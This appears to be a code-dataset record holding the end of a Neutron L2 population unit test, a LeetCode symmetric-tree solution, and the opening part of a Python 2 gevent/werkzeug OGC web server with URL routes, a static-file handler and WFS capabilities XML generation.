'method': 'add_fdb_entries'}
topic = topics.get_topic_name(topics.AGENT,
topics.L2POPULATION,
topics.UPDATE,
HOST)
self.mock_cast.assert_called_with(mock.ANY,
expected1,
topic=topic)
p3_ips = [p['ip_address']
for p in p3['fixed_ips']]
expected2 = {'args':
{'fdb_entries':
{p1['network_id']:
{'ports':
{'20.0.0.1':
[constants.FLOODING_ENTRY,
[p3['mac_address'],
p3_ips[0]]]},
'network_type': 'vxlan',
'segment_id': 1}}},
'namespace': None,
'method': 'add_fdb_entries'}
self.mock_fanout.assert_called_with(
mock.ANY, expected2,
topic=self.fanout_topic)
def test_fdb_remove_called_from_rpc(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg):
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg) as port:
p1 = port['port']
device = 'tap' + p1['id']
self.mock_fanout.reset_mock()
self.callbacks.update_device_up(self.adminContext,
agent_id=HOST,
device=device)
self.callbacks.update_device_down(self.adminContext,
agent_id=HOST,
device=device)
p1_ips = [p['ip_address'] for p in p1['fixed_ips']]
expected = {'args':
{'fdb_entries':
{p1['network_id']:
{'ports':
{'20.0.0.1': [[p1['mac_address'],
p1_ips[0]]]},
'network_type': 'vxlan',
'segment_id': 1}}},
'namespace': None,
'method': 'remove_fdb_entries'}
self.mock_fanout.assert_called_with(
mock.ANY, expected, topic=self.fanout_topic)
def test_fdb_remove_called(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg):
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg) as port:
p1 = port['port']
device = 'tap' + p1['id']
self.mock_fanout.reset_mock()
self.callbacks.update_device_up(self.adminContext,
agent_id=HOST,
device=device)
p1_ips = [p['ip_address'] for p in p1['fixed_ips']]
expected = {'args':
{'fdb_entries':
{p1['network_id']:
{'ports':
{'20.0.0.1': [[p1['mac_address'],
p1_ips[0]]]},
'network_type': 'vxlan',
'segment_id': 1}}},
'namespace': None,
'method': 'remove_fdb_entries'}
self.mock_fanout.assert_any_call(
mock.ANY, expected, topic=self.fanout_topic)
def test_fdb_remove_called_last_port(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg) as port:
p1 = port['port']
device = 'tap' + p1['id']
self.callbacks.update_device_up(self.adminContext,
agent_id=HOST,
device=device)
p1_ips = [p['ip_address'] for p in p1['fixed_ips']]
expected = {'args':
{'fdb_entries':
{p1['network_id']:
{'ports':
{'20.0.0.1': [constants.FLOODING_ENTRY,
[p1['mac_address'],
p1_ips[0]]]},
'network_type': 'vxlan',
'segment_id': 1}}},
'namespace': None,
'method': 'remove_fdb_entries'}
self.mock_fanout.assert_any_call(
mock.ANY, expected, topic=self.fanout_topic)
def test_fixed_ips_changed(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST}
with self.port(subnet=subnet, cidr='10.0.0.0/24',
arg_list=(portbindings.HOST_ID,),
**host_arg) as port1:
p1 = port1['port']
device = 'tap' + p1['id']
self.callbacks.update_device_up(self.adminContext,
agent_id=HOST,
device=device)
self.mock_fanout.reset_mock()
data = {'port': {'fixed_ips': [{'ip_address': '10.0.0.2'},
{'ip_address': '10.0.0.10'}]}}
req = self.new_update_request('ports', data, p1['id'])
res = self.deserialize(self.fmt, req.get_response(self.api))
ips = res['port']['fixed_ips']
self.assertEqual(len(ips), 2)
add_expected = {'args':
{'fdb_entries':
{'chg_ip':
{p1['network_id']:
{'20.0.0.1':
{'after': [[p1['mac_address'],
'10.0.0.10']]}}}}},
'namespace': None,
'method': 'update_fdb_entries'}
self.mock_fanout.assert_any_call(
mock.ANY, add_expected, topic=self.fanout_topic)
self.mock_fanout.reset_mock()
data = {'port': {'fixed_ips': [{'ip_address': '10.0.0.2'},
{'ip_address': '10.0.0.16'}]}}
req = self.new_update_request('ports', data, p1['id'])
res = self.deserialize(self.fmt, req.get_response(self.api))
ips = res['port']['fixed_ips']
self.assertEqual(len(ips), 2)
upd_expected = {'args':
{'fdb_entries':
{'chg_ip':
{p1['network_id']:
{'20.0.0.1':
{'before': [[p1['mac_address'],
'10.0.0.10']],
'after': [[p1['mac_address'],
'10.0.0.16']]}}}}},
'namespace': None,
'method': 'update_fdb_entries'}
self.mock_fanout.assert_any_call(
mock.ANY, upd_expected, topic=self.fanout_topic)
self.mock_fanout.reset_mock()
data = {'port': {'fixed_ips': [{'ip_address': '10.0.0.16'}]}}
req = self.new_update_request('ports', data, p1['id'])
res = self.deserialize(self.fmt, req.get_response(self.api))
ips = res['port']['fixed_ips']
self.assertEqual(len(ips), 1)
del_expected = {'args':
{'fdb_entries':
{'chg_ip':
{p1['network_id']:
{'20.0.0.1':
{'before': [[p1['mac_address'],
'10.0.0.2']]}}}}},
'namespace': None,
'method': 'update_fdb_entries'}
self.mock_fanout.assert_any_call(
mock.ANY, del_expected, topic=self.fanout_topic)
def test_no_fdb_updates_without_port_updates(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST}
with self.port(subnet=subnet, cidr='10.0.0.0/24',
arg_list=(portbindings.HOST_ID,),
**host_arg) as port1:
p1 = port1['port']
device = 'tap' + p1['id']
self.callbacks.update_device_up(self.adminContext,
agent_id=HOST,
device=device)
p1['status'] = 'ACTIVE'
self.mock_fanout.reset_mock()
fanout = ('neutron.plugins.ml2.drivers.l2pop.rpc.'
'L2populationAgentNotifyAPI._notification_fanout')
fanout_patch = mock.patch(fanout)
mock_fanout = fanout_patch.start()
plugin = manager.NeutronManager.get_plugin()
plugin.update_port(self.adminContext, p1['id'], port1)
self.assertFalse(mock_fanout.called)
fanout_patch.stop()
| 44.179024
| 78
| 0.430396
|
9a7838d1958e4033bd7742faeb1993b416a6a815
| 601
|
py
|
Python
|
algorithms/symmetric_tree.py
|
kainonly/leetcode
|
83a84ad48d517eb7f1377cb2a3aa3fe763da6627
|
[
"MIT"
] | null | null | null |
algorithms/symmetric_tree.py
|
kainonly/leetcode
|
83a84ad48d517eb7f1377cb2a3aa3fe763da6627
|
[
"MIT"
] | null | null | null |
algorithms/symmetric_tree.py
|
kainonly/leetcode
|
83a84ad48d517eb7f1377cb2a3aa3fe763da6627
|
[
"MIT"
] | null | null | null |
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def isSymmetric(self, root: TreeNode) -> bool:
def isSame(node1: TreeNode, node2: TreeNode):
if not node1 and not node2:
return True
if not node1 or not node2:
return False
return node1.val == node2.val and isSame(node1.left, node2.right) and isSame(node1.right, node2.left)
return isSame(root.left, root.right)
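# --- Hedged usage example (not part of the original solution) ---
# Builds the classic symmetric tree [1, 2, 2, 3, 4, 4, 3] by hand, plus an
# asymmetric counter-example, and runs isSymmetric on both.
if __name__ == "__main__":
    symmetric = TreeNode(1,
                         TreeNode(2, TreeNode(3), TreeNode(4)),
                         TreeNode(2, TreeNode(4), TreeNode(3)))
    asymmetric = TreeNode(1,
                          TreeNode(2, right=TreeNode(3)),
                          TreeNode(2, right=TreeNode(3)))
    solver = Solution()
    print(solver.isSymmetric(symmetric))   # True
    print(solver.isSymmetric(asymmetric))  # False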
| 31.631579
| 113
| 0.605657
|
bba6b30d93593ff8a33d70cad5d3127a62a6dd4c
| 349,512
|
py
|
Python
|
ogc_server.py
|
timebackzhou/ogc_server
|
3355ebfafa4075e700bc9d55dbc727adc3626f09
|
[
"MIT"
] | null | null | null |
ogc_server.py
|
timebackzhou/ogc_server
|
3355ebfafa4075e700bc9d55dbc727adc3626f09
|
[
"MIT"
] | null | null | null |
ogc_server.py
|
timebackzhou/ogc_server
|
3355ebfafa4075e700bc9d55dbc727adc3626f09
|
[
"MIT"
] | 1
|
2019-09-16T14:02:28.000Z
|
2019-09-16T14:02:28.000Z
|
# -*- coding: utf-8 -*-
import codecs
import os, sys
import copy
import random
import json
import math
import decimal
import datetime
import threading
import exceptions
import time
import base64
import md5
from gevent import socket
import urllib, urllib2, urlparse
from socket import error
import errno
import subprocess
from multiprocessing import Process, Queue, current_process, freeze_support
import shutil
import re
#from PIL import Image
import StringIO
import cgi
import uuid
import copy
from contextlib import contextmanager
from gevent import pywsgi
import gevent
import gevent.fileobject
from gevent.local import local
from gevent.subprocess import check_output
import pymongo
import gridfs
from bson.objectid import ObjectId
try:
from geventhttpclient import HTTPClient, URL
except:
print('geventhttpclient import error')
try:
import geventwebsocket
from geventwebsocket.handler import WebSocketHandler
except:
print('geventwebsocket import error')
# try:
# from pysimplesoap.server import SoapDispatcher, WSGISOAPHandler
# from pysimplesoap.client import SoapClient, SoapFault
# except:
# print('pysimplesoap import error')
try:
from PIL import Image
except :
print('PIL import error')
try:
from lxml import etree
except:
print('lxml import error')
try:
import czml
except:
print('czml import error')
try:
from py3o.template import Template
except:
print('import py3o.template error')
import werkzeug
from werkzeug.wrappers import Request, BaseResponse
from werkzeug.local import LocalProxy
from werkzeug.contrib.sessions import FilesystemSessionStore
from werkzeug.utils import dump_cookie, parse_cookie
from werkzeug.routing import Map, Rule, BaseConverter, ValidationError, HTTPException
from sessions import MongoClient, MongodbSessionStore
import configobj
import db_util
import bayes_util
from module_locator import module_path, dec, dec1, enc, enc1
ENCODING = None
ENCODING1 = None
STATICRESOURCE_DIR = None
STATICRESOURCE_CSS_DIR = None
STATICRESOURCE_JS_DIR = None
STATICRESOURCE_IMG_DIR = None
UPLOAD_PHOTOS_DIR = None
UPLOAD_VOICE_DIR = None
gConfig = None
gStaticCache = {}
gTileCache = {}
#deprecated
gSatTileCache = {}
gMapTileCache = {}
gTerrainCache = {}
gGreenlets = {}
gClusterProcess = {}
gLoginToken = {}
gSecurityConfig = {}
gWebSocketsMap = {}
gTcpReconnectCounter = 0
gTcpSock = None
gHttpClient = {}
gFormTemplate = []
_SPECIAL = re.escape('()<>@,;:\\"/[]?={} \t')
_RE_SPECIAL = re.compile('[%s]' % _SPECIAL)
_QSTR = '"(?:\\\\.|[^"])*"' # Quoted string
_VALUE = '(?:[^%s]+|%s)' % (_SPECIAL, _QSTR) # Safe (unquoted) or quoted string
_OPTION = '(?:;|^)\s*([^%s]+)\s*=\s*(%s)' % (_SPECIAL, _VALUE)
_RE_OPTION = re.compile(_OPTION) # key=value part of an Content-Type like header
gSessionStore = None
gRequests = None
gRequest = None
gProxyRequest = None
gJoinableQueue = None
class BooleanConverter(BaseConverter):
def __init__(self, url_map, randomify=False):
super(BooleanConverter, self).__init__(url_map)
self.regex = '(?:true|false)'
def to_python(self, value):
return value == 'true'
def to_url(self, value):
return value and 'true' or 'false'
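# Editor's note (sketch, not in the original source): BooleanConverter lets a
# rule such as Rule('/flag/<bool:enabled>', endpoint='flag') accept only the
# literal strings "true"/"false" and hand the endpoint a Python bool, e.g.:
#
#   m = Map([Rule('/flag/<bool:enabled>', endpoint='flag')],
#           converters={'bool': BooleanConverter})
#   m.bind('localhost').match('/flag/true')   # -> ('flag', {'enabled': True})
#
# The '/flag' rule and endpoint name are hypothetical, shown for illustration.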
class Py3oItem(object):
pass
gUrlMap = Map([
Rule('/', endpoint='firstaccess'),
Rule('/websocket', endpoint='handle_websocket'),
#Rule('/auth_check/<username>/isnew/<bool:isnew>', endpoint='saveuser'),
Rule('/get_salt', endpoint='get_salt'),
Rule('/auth_check/<username>', endpoint='auth_check'),
Rule('/auth_check', endpoint='auth_check'),
Rule('/register/<username>/<password>', endpoint='user_add'),
Rule('/register/<username>', endpoint='user_add'),
Rule('/register', endpoint='user_add'),
Rule('/unregister/<username>', endpoint='user_delete'),
Rule('/unregister', endpoint='user_delete'),
Rule('/login/<username>/<password>', endpoint='login'),
Rule('/login/<username>', endpoint='login'),
Rule('/login', endpoint='login'),
Rule('/logout', endpoint='logout'),
Rule('/reset_password/<username>/<password>', endpoint='reset_password'),
Rule('/reset_password/<username>', endpoint='reset_password'),
Rule('/reset_password', endpoint='reset_password'),
Rule('/user_check', endpoint='user_check'),
Rule('/user_query', endpoint='user_query'),
Rule('/user_update', endpoint='user_update'),
Rule('/function_add', endpoint='function_add'),
Rule('/function_query', endpoint='function_query'),
Rule('/function_update', endpoint='function_update'),
Rule('/function_delete', endpoint='function_delete'),
Rule('/role_add', endpoint='role_add'),
Rule('/role_update', endpoint='role_update'),
Rule('/role_query', endpoint='role_query'),
Rule('/role_delete', endpoint='role_delete'),
Rule('/role_template_save', endpoint='role_template_save'),
Rule('/role_template_get', endpoint='role_template_get'),
Rule('/workflow_add', endpoint='workflow_add'),
Rule('/workflow_query', endpoint='workflow_query'),
Rule('/workflow_query/<_id>', endpoint='workflow_query'),
Rule('/workflow_update', endpoint='workflow_update'),
Rule('/workflow_delete', endpoint='workflow_delete'),
Rule('/workflow_delete/<_id>', endpoint='workflow_delete'),
Rule('/workflow_template_add', endpoint='workflow_template_add'),
Rule('/workflow_template_query', endpoint='workflow_template_query'),
Rule('/workflow_template_query/<_id>', endpoint='workflow_template_query'),
Rule('/workflow_template_update', endpoint='workflow_template_update'),
Rule('/workflow_template_delete', endpoint='workflow_template_delete'),
Rule('/workflow_template_delete/<_id>', endpoint='workflow_template_delete'),
Rule('/workflow_form_fill', endpoint='workflow_form_fill'),
Rule('/workflow_form_blank', endpoint='workflow_form_blank'),
Rule('/user_add', endpoint='user_add'),
Rule('/user_get', endpoint='user_get'),
Rule('/all_user_get', endpoint='all_user_get'),
Rule('/user_remove', endpoint='user_remove'),
Rule('/group_add', endpoint='group_add'),
Rule('/group_get', endpoint='group_get'),
Rule('/group_update', endpoint='group_update'),
Rule('/group_remove', endpoint='group_remove'),
Rule('/user_group_get', endpoint='user_group_get'),
Rule('/user_contact_get', endpoint='user_contact_get'),
Rule('/chat_broadcast', endpoint='chat_broadcast'),
Rule('/chat_log_query', endpoint='chat_log_query'),
Rule('/chat_log_remove', endpoint='chat_log_remove'),
Rule('/gridfs/upload', endpoint='gridfs_upload'),
Rule('/gridfs/get', endpoint='gridfs_get'),
Rule('/gridfs/get/<_id>', endpoint='gridfs_get'),
Rule('/gridfs/get/<_id>/thumbnail/<width>/<height>', endpoint='gridfs_get'),
Rule('/gridfs/query/<width>/<height>', endpoint='gridfs_query'),
Rule('/gridfs/query/<width>/<height>/<limit>', endpoint='gridfs_query'),
Rule('/gridfs/query/<width>/<height>/<limit>/<skip>', endpoint='gridfs_query'),
Rule('/gridfs/delete', endpoint='gridfs_delete'),
Rule('/gridfs/delete/<_id>', endpoint='gridfs_delete'),
Rule('/antibird/get_equip_list', endpoint='get_equip_list'),
Rule('/antibird/get_latest_records_by_imei', endpoint='get_latest_records_by_imei'),
Rule('/antibird/equip_tower_mapping', endpoint='equip_tower_mapping'),
Rule('/state_examination/save', endpoint='state_examination_save'),
Rule('/state_examination/query', endpoint='state_examination_query'),
Rule('/state_examination/query/line_names', endpoint='state_examination_query_line_names'),
Rule('/state_examination/delete', endpoint='state_examination_delete'),
Rule('/state_examination/delete/<_id>', endpoint='state_examination_delete'),
Rule('/bayesian/query/graphiz', endpoint='bayesian_query_graphiz'),
Rule('/bayesian/query/node', endpoint='bayesian_query_node'),
Rule('/bayesian/query/predict', endpoint='bayesian_query_predict'),
Rule('/bayesian/save/node', endpoint='bayesian_save_node'),
Rule('/bayesian/delete/node', endpoint='bayesian_delete_node'),
Rule('/bayesian/delete/node/<_id>', endpoint='bayesian_delete_node'),
Rule('/bayesian/query/domains_range', endpoint='bayesian_query_domains_range'),
Rule('/bayesian/save/domains_range', endpoint='bayesian_save_domains_range'),
Rule('/bayesian/delete/domains_range', endpoint='bayesian_delete_domains_range'),
Rule('/bayesian/delete/domains_range/<_id>', endpoint='bayesian_delete_domains_range'),
Rule('/bayesian/reset/unit', endpoint='bayesian_reset_unit'),
], converters={'bool': BooleanConverter})
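# Editor's sketch (assumption, not part of the original file): gUrlMap is a
# werkzeug Map, so a front-end would typically resolve the endpoint name and
# its URL arguments before calling the matching handler, roughly:
#
#   urls = gUrlMap.bind_to_environ(environ)
#   endpoint, args = urls.match()     # e.g. ('login', {'username': u'bob'})
#
# How the endpoint string is mapped to a handler function is defined elsewhere
# in this module; the example above only shows the werkzeug matching step.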
@contextmanager
def session_manager(environ):
global gRequests, gRequest
if gRequests is None:
gRequests = local()
gRequest = LocalProxy(lambda: gRequests.request)
gRequests.request = Request(environ)
yield
gRequests.request = None
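# Editor's sketch (illustrative only): session_manager wraps a single WSGI
# request so the module-level LocalProxy gRequest points at the current
# werkzeug Request while the handler runs, e.g.:
#
#   def some_wsgi_entry(environ, start_response):   # hypothetical name
#       with session_manager(environ):
#           method = gRequest.method
#           args = gRequest.args.to_dict()
#       ...
#
# The real application callable is defined further down in this file.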
def init_global():
global ENCODING, ENCODING1, STATICRESOURCE_DIR, STATICRESOURCE_CSS_DIR, STATICRESOURCE_JS_DIR, STATICRESOURCE_IMG_DIR, UPLOAD_PHOTOS_DIR, UPLOAD_VOICE_DIR
global gConfig, gStaticCache, gGreenlets, gClusterProcess, gSecurityConfig, gJoinableQueue
ENCODING = 'utf-8'
ENCODING1 = 'gb18030'
STATICRESOURCE_DIR = os.path.join(module_path(), 'static')
#CONFIGFILE = os.path.join(module_path(), 'ogc-config.ini')
#gConfig = configobj.ConfigObj(db_util.CONFIGFILE, encoding='UTF8')
gConfig = db_util.gConfig
if gConfig['web'].has_key('webroot') and len(gConfig['web']['webroot'])>0:
if os.path.exists(gConfig['web']['webroot']):
STATICRESOURCE_DIR = gConfig['web']['webroot']
STATICRESOURCE_CSS_DIR = os.path.join(STATICRESOURCE_DIR, 'css')
STATICRESOURCE_JS_DIR = os.path.join(STATICRESOURCE_DIR, 'js')
STATICRESOURCE_IMG_DIR = os.path.join(STATICRESOURCE_DIR, 'img')
UPLOAD_PHOTOS_DIR = os.path.join(STATICRESOURCE_DIR,'photos', 'upload')
UPLOAD_VOICE_DIR = os.path.join(STATICRESOURCE_DIR,'voice')
if gConfig['wsgi']['application'].lower() == 'authorize_platform':
gSecurityConfig = db_util.mongo_find_one(gConfig['authorize_platform']['mongodb']['database'],
gConfig['authorize_platform']['mongodb']['collection_security_config'],
{},
'authorize_platform'
)
if gSecurityConfig is None:
gSecurityConfig = {}
if gConfig['wsgi']['application'].lower() in ['pay_platform', 'fake_gateway_alipay']:
gJoinableQueue = gevent.queue.JoinableQueue(maxsize=int(gConfig['pay_platform']['queue']['max_queue_size']))
l = db_util.mongo_find(gConfig['pay_platform']['mongodb']['database'],
gConfig['pay_platform']['mongodb']['collection_config'],
{},
0,
'pay_platform'
)
for i in l:
del i['_id']
key = i.keys()[0]
gSecurityConfig[key] = i[key]
if len(l) == 0:
gSecurityConfig = {}
if gConfig['wsgi']['application'].lower() == 'chat_platform':
gJoinableQueue = gevent.queue.JoinableQueue(maxsize=int(gConfig['chat_platform']['queue']['max_queue_size']))
def handle_static(environ, aUrl):
global ENCODING, gConfig
global STATICRESOURCE_DIR, STATICRESOURCE_JS_DIR, STATICRESOURCE_CSS_DIR, STATICRESOURCE_IMG_DIR, UPLOAD_VOICE_DIR
statuscode, contenttype, body = '404 Not Found', 'text/plain;charset=' + ENCODING, '404 Not Found'
surl = dec(aUrl)#.replace('//', '').replace('/', os.path.sep)
if surl[0:2] == '//':
surl = surl[2:]
if surl[0] == '/':
surl = surl[1:]
p = os.path.join(STATICRESOURCE_DIR , surl)
isBin = False
ext = os.path.splitext(p)[1]
if '.' in surl:
ext = surl[surl.rindex('.'):]
else:
ext = os.path.splitext(p)[1]
print('handle_static p=%s' % p)
if len(ext)>0:
if gConfig['mime_type'].has_key(ext):
if 'image/' in gConfig['mime_type'][ext]:
isBin = True
if '/octet-stream' in gConfig['mime_type'][ext]:
isBin = True
if '/pdf' in gConfig['mime_type'][ext]:
isBin = True
contenttype = gConfig['mime_type'][ext]
if ext == '.js':
if not os.path.exists(p):
p = os.path.join(STATICRESOURCE_JS_DIR, aUrl[aUrl.rindex('/')+1:])
elif ext == '.css':
if not os.path.exists(p):
p = os.path.join(STATICRESOURCE_CSS_DIR, aUrl[aUrl.rindex('/')+1:])
elif 'image/' in gConfig['mime_type'][ext]:
if not os.path.exists(p):
p = os.path.abspath(os.path.join(STATICRESOURCE_IMG_DIR, aUrl[aUrl.rindex('/')+1:]))
if not os.path.exists(p):
p = os.path.join(STATICRESOURCE_DIR , aUrl)
#p = os.path.abspath(p)
p = dec(p)
if os.path.exists(p):
statuscode = '200 OK'
mode = 'r'
if isBin:
mode = 'rb'
with open(p, mode) as f:
f1 = gevent.fileobject.FileObjectThread(f, mode)
body = f1.read()
else:
statuscode = '404 Not Found'
body = '404 Not Found'
else:
contenttype = 'application/octet-stream'
if os.path.exists(p):
statuscode = '200 OK'
with open(p, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
body = f1.read()
else:
if ext == '.3gp':
id = surl[surl.rindex('/') + 1:]
id = id.replace('.3gp', '')
fn = get_voice_file_latest(id)
if fn:
with open(os.path.join(UPLOAD_VOICE_DIR, fn), 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
body = f1.read()
statuscode = '200 OK'
else:
contenttype = 'text/plain;charset=' + ENCODING
statuscode = '500 Internal Server Error'
body = '500 Internal Server Error'
headers = {}
headers['Content-Type'] = str(contenttype)
return statuscode, headers, body
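# Editor's note (sketch): handlers in this module return a
# (status, headers, body) triple; a WSGI caller would typically forward it
# roughly like this (illustrative only):
#
#   status, headers, body = handle_static(environ, environ['PATH_INFO'])
#   start_response(status, list(headers.items()))
#   return [body]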
def handle_wfs_GetCapabilities(params):
headers = {}
headers['Content-Type'] = 'text/xml;charset=' + ENCODING
s = create_wfs_GetCapabilities()
return '200 OK', headers, s
def handle_wfs_GetFeature(params):
headers = {}
headers['Content-Type'] = 'text/xml;charset=' + ENCODING
s = create_wfs_GetFeature()
return '200 OK', headers, s
def create_wfs_GetCapabilities():
namespace = {'ows':"http://www.opengis.net/ows",
'ogc':"http://www.opengis.net/ogc",
'wfs':"http://www.opengis.net/wfs",
'gml':"http://www.opengis.net/gml",
'xlink':"http://www.w3.org/1999/xlink",
'xsi':"http://www.w3.org/2001/XMLSchema-instance",
'schemaLocation':"http://www.opengis.net/wfs/1.1.0/WFS.xsd",
'my':"http://localhost:88/my"
}
wfs = '{%s}' % namespace['wfs']
ogc = '{%s}' % namespace['ogc']
ows = '{%s}' % namespace['ows']
xlink = '{%s}' % namespace['xlink']
    root = etree.Element(wfs+"WFS_Capabilities", xmlns="http://www.opengis.net/wfs", nsmap=namespace, version="1.1.0", updateSequence="0")
#ServiceIdentification
ServiceIdentification = etree.SubElement(root, ows + "ServiceIdentification")
Title = etree.SubElement(ServiceIdentification, ows + "Title").text = gConfig['wfs']['ServiceIdentification_Title']
ServiceType = etree.SubElement(ServiceIdentification, ows + "ServiceType").text = 'WFS'
ServiceTypeVersion = etree.SubElement(ServiceIdentification, ows + "ServiceTypeVersion").text = '1.1.0'
#OperationsMetadata
OperationsMetadata = etree.SubElement(root, ows + "OperationsMetadata")
Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="GetCapabilities")
DCP= etree.SubElement(Operation, ows + "DCP")
HTTP= etree.SubElement(DCP, ows + "HTTP")
href = xlink + 'href'
Get= etree.SubElement(HTTP, ows + "Get", {href:gConfig['wfs']['url']})
#Constraint= etree.SubElement(Get, ows + "Constraint", name="GetEncoding")
#AllowedValues= etree.SubElement(Constraint, ows + "AllowedValues")
#Value= etree.SubElement(AllowedValues, ows + "Value").text = 'KVP'
#Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="GetTile")
#DCP= etree.SubElement(Operation, ows + "DCP")
#HTTP= etree.SubElement(DCP, ows + "HTTP")
#Get= etree.SubElement(HTTP, ows + "Get", {href:gConfig['wmts']['url']})
Parameter = etree.SubElement(Operation, ows + "Parameter", name="AcceptVersions")
Value = etree.SubElement(Parameter, ows + "Value").text = "1.1.0"
Value = etree.SubElement(Parameter, ows + "Value").text = "1.0.0"
Parameter = etree.SubElement(Operation, ows + "Parameter", name="AcceptFormats")
Value = etree.SubElement(Parameter, ows + "Value").text = "text/xml"
Parameter = etree.SubElement(Operation, ows + "Parameter", name="Sections")
Value = etree.SubElement(Parameter, ows + "Value").text = "ServiceIdentification"
Value = etree.SubElement(Parameter, ows + "Value").text = "OperationsMetadata"
Value = etree.SubElement(Parameter, ows + "Value").text = "FeatureTypeList"
Value = etree.SubElement(Parameter, ows + "Value").text = "ServesGMLObjectTypeList"
Value = etree.SubElement(Parameter, ows + "Value").text = "SupportsGMLObjectTypeList"
Value = etree.SubElement(Parameter, ows + "Value").text = "Filter_Capabilities"
Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="DescribeFeatureType")
DCP= etree.SubElement(Operation, ows + "DCP")
HTTP= etree.SubElement(DCP, ows + "HTTP")
Get= etree.SubElement(HTTP, ows + "Get", {href:gConfig['wfs']['url']})#+'/wfs.cgi?'})
Post= etree.SubElement(HTTP, ows + "Post", {href:gConfig['wfs']['url']})#+'/wfs.cgi'})
Parameter = etree.SubElement(Operation, ows + "Parameter", name="outputFormat")
Value = etree.SubElement(Parameter, ows + "Value").text = "text/xml; subtype=gml/3.1.1"
Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="GetFeature")
DCP= etree.SubElement(Operation, ows + "DCP")
HTTP= etree.SubElement(DCP, ows + "HTTP")
Get= etree.SubElement(HTTP, ows + "Get", {href:gConfig['wfs']['url']})#+'/wfs.cgi?'})
Post= etree.SubElement(HTTP, ows + "Post", {href:gConfig['wfs']['url']})#+'/wfs.cgi'})
Parameter = etree.SubElement(Operation, ows + "Parameter", name="resultType")
Value = etree.SubElement(Parameter, ows + "Value").text = "results"
Value = etree.SubElement(Parameter, ows + "Value").text = "hits"
Parameter = etree.SubElement(Operation, ows + "Parameter", name="outputFormat")
Value = etree.SubElement(Parameter, ows + "Value").text = "text/xml; subtype=gml/3.1.1"
Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="GetFeatureWithLock")
DCP= etree.SubElement(Operation, ows + "DCP")
HTTP= etree.SubElement(DCP, ows + "HTTP")
Post= etree.SubElement(HTTP, ows + "Post", {href:gConfig['wfs']['url']})
Parameter = etree.SubElement(Operation, ows + "Parameter", name="resultType")
Value = etree.SubElement(Parameter, ows + "Value").text = "results"
Value = etree.SubElement(Parameter, ows + "Value").text = "hits"
Parameter = etree.SubElement(Operation, ows + "Parameter", name="outputFormat")
Value = etree.SubElement(Parameter, ows + "Value").text = "text/xml; subtype=gml/3.1.1"
Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="GetGMLObject")
DCP= etree.SubElement(Operation, ows + "DCP")
HTTP= etree.SubElement(DCP, ows + "HTTP")
Post= etree.SubElement(HTTP, ows + "Post", {href:gConfig['wfs']['url']})
Parameter = etree.SubElement(Operation, ows + "Parameter", name="outputFormat")
Value = etree.SubElement(Parameter, ows + "Value").text = "text/xml; subtype=gml/3.1.1"
Value = etree.SubElement(Parameter, ows + "Value").text = "text/xhtml"
Parameter = etree.SubElement(Operation, ows + "Parameter", name="LocalTraverseXLinkScope")
Value = etree.SubElement(Parameter, ows + "Value").text = "0"
Value = etree.SubElement(Parameter, ows + "Value").text = "*"
Parameter = etree.SubElement(Operation, ows + "Parameter", name="RemoteTraverseXLinkScope")
Value = etree.SubElement(Parameter, ows + "Value").text = "0"
Value = etree.SubElement(Parameter, ows + "Value").text = "*"
Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="LockFeature")
DCP= etree.SubElement(Operation, ows + "DCP")
HTTP= etree.SubElement(DCP, ows + "HTTP")
Post= etree.SubElement(HTTP, ows + "Post", {href:gConfig['wfs']['url']})
Parameter = etree.SubElement(Operation, ows + "Parameter", name="lockAction")
Value = etree.SubElement(Parameter, ows + "Value").text = "ALL"
Value = etree.SubElement(Parameter, ows + "Value").text = "SOME"
Operation= etree.SubElement(OperationsMetadata, ows + "Operation", name="Transaction")
DCP= etree.SubElement(Operation, ows + "DCP")
HTTP= etree.SubElement(DCP, ows + "HTTP")
Post= etree.SubElement(HTTP, ows + "Post", {href:gConfig['wfs']['url']})
Parameter = etree.SubElement(Operation, ows + "Parameter", name="inputFormat")
Value = etree.SubElement(Parameter, ows + "Value").text = "text/xml; subtype=gml/3.1.1"
Parameter = etree.SubElement(Operation, ows + "Parameter", name="idgen")
Value = etree.SubElement(Parameter, ows + "Value").text = "GenerateNew"
Value = etree.SubElement(Parameter, ows + "Value").text = "UseExisting"
Value = etree.SubElement(Parameter, ows + "Value").text = "ReplaceDuplicate"
Parameter = etree.SubElement(Operation, ows + "Parameter", name="releaseAction")
Value = etree.SubElement(Parameter, ows + "Value").text = "ALL"
Value = etree.SubElement(Parameter, ows + "Value").text = "SOME"
Parameter = etree.SubElement(OperationsMetadata, ows + "Parameter", name="srsName")
Value = etree.SubElement(Parameter, ows + "Value").text = "EPSG:4326"
Constraint = etree.SubElement(OperationsMetadata, ows + "Constraint", name="DefaultMaxFeatures")
Value = etree.SubElement(Constraint, ows + "Value").text = "10000"
Constraint = etree.SubElement(OperationsMetadata, ows + "Constraint", name="LocalTraverseXLinkScope")
Value = etree.SubElement(Constraint, ows + "Value").text = "0"
Value = etree.SubElement(Constraint, ows + "Value").text = "*"
Constraint = etree.SubElement(OperationsMetadata, ows + "Constraint", name="RemoteTraverseXLinkScope")
Value = etree.SubElement(Constraint, ows + "Value").text = "0"
